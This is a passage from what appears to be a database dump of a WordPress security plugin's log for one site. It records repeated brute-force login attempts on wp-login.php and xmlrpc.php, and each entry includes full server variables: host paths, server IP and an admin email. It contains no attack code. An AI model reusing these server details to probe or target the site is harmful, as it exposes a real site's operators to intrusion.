";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"66.85.47.62\";s:11:\"REMOTE_PORT\";s:5:\"51524\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXKw5Z-ykrSqSXdQMBKZJwAAAEw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567797477.7737\";s:12:\"REQUEST_TIME\";s:10:\"1567797477\";}}','notice','2019-09-06 19:17:59','2019-09-06 19:17:58',17743536,19234384,'https://bintara.com.my/wp-login.php',1,0,'66.85.47.62'),(23675,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"66.85.47.62\";s:11:\"REMOTE_PORT\";s:5:\"52550\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXKw6p-ykrSqSXdQMBKZKQAAAEI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567797482.6021\";s:12:\"REQUEST_TIME\";s:10:\"1567797482\";}}','notice','2019-09-06 19:18:06','2019-09-06 19:18:03',18258872,19555832,'https://bintara.com.my/xmlrpc.php',1,0,'66.85.47.62'),(23676,0,'notification_center','send_scheduled','a:2:{s:13:\"notifications\";a:1:{i:0;s:6:\"digest\";}s:6:\"silent\";b:0;}','debug','2019-09-06 20:21:38','2019-09-06 20:21:35',17793240,18255672,'http://bintara.com.my/old/feal.php',1,0,'45.55.152.56'),(23677,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"195.56.146.169\";s:11:\"REMOTE_PORT\";s:5:\"10540\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXLaaXoC3wh6TCR17Wu3ZgAAAQc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567808105.5841\";s:12:\"REQUEST_TIME\";s:10:\"1567808105\";}}','notice','2019-09-06 22:15:06','2019-09-06 22:15:05',17743464,19234352,'https://bintara.com.my/wp-login.php',1,0,'195.56.146.169'),(23678,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"195.56.146.169\";s:11:\"REMOTE_PORT\";s:5:\"10878\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXLabDpoGFgdOeb7yBqPlwAAAEQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567808108.7083\";s:12:\"REQUEST_TIME\";s:10:\"1567808108\";}}','notice','2019-09-06 22:15:10','2019-09-06 22:15:09',18257576,19554952,'https://bintara.com.my/xmlrpc.php',1,0,'195.56.146.169'),(23679,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"85\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"139.59.164.196\";s:11:\"REMOTE_PORT\";s:5:\"52904\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXLr9DpoGFgdOeb7yBqWwQAAAFA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567812596.3856\";s:12:\"REQUEST_TIME\";s:10:\"1567812596\";}}','notice','2019-09-06 23:29:57','2019-09-06 23:29:56',17743976,19236416,'https://bintara.com.my/wp-login.php',1,0,'139.59.164.196'),(23680,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"100.26.104.241\";s:11:\"REMOTE_PORT\";s:5:\"56608\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXMJFTpoGFgdOeb7yBqkHAAAAEQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567820053.6149\";s:12:\"REQUEST_TIME\";s:10:\"1567820053\";}}','notice','2019-09-07 01:34:14','2019-09-07 01:34:13',17742264,19232872,'https://bintara.com.my/wp-login.php',1,0,'100.26.104.241'),(23681,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"100.26.104.241\";s:11:\"REMOTE_PORT\";s:5:\"57022\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXMJGDpoGFgdOeb7yBqkHgAAAFU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1567820056.451\";s:12:\"REQUEST_TIME\";s:10:\"1567820056\";}}','notice','2019-09-07 01:34:17','2019-09-07 01:34:16',18255736,19552792,'https://bintara.com.my/xmlrpc.php',1,0,'100.26.104.241'),(23682,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"45.77.171.53\";s:11:\"REMOTE_PORT\";s:5:\"52334\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXM8bfS2bVgQ4Lf3mOoTHAAAAI0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567833197.2667\";s:12:\"REQUEST_TIME\";s:10:\"1567833197\";}}','notice','2019-09-07 05:13:19','2019-09-07 05:13:17',17740384,19230088,'https://bintara.com.my/wp-login.php',1,0,'45.77.171.53'),(23683,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"45.77.171.53\";s:11:\"REMOTE_PORT\";s:5:\"52752\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXM8cFlYK-J0FEdSWigufwAAAVY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567833200.7905\";s:12:\"REQUEST_TIME\";s:10:\"1567833200\";}}','notice','2019-09-07 05:13:22','2019-09-07 05:13:21',18258192,19554344,'https://bintara.com.my/xmlrpc.php',1,0,'45.77.171.53'),(23684,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Co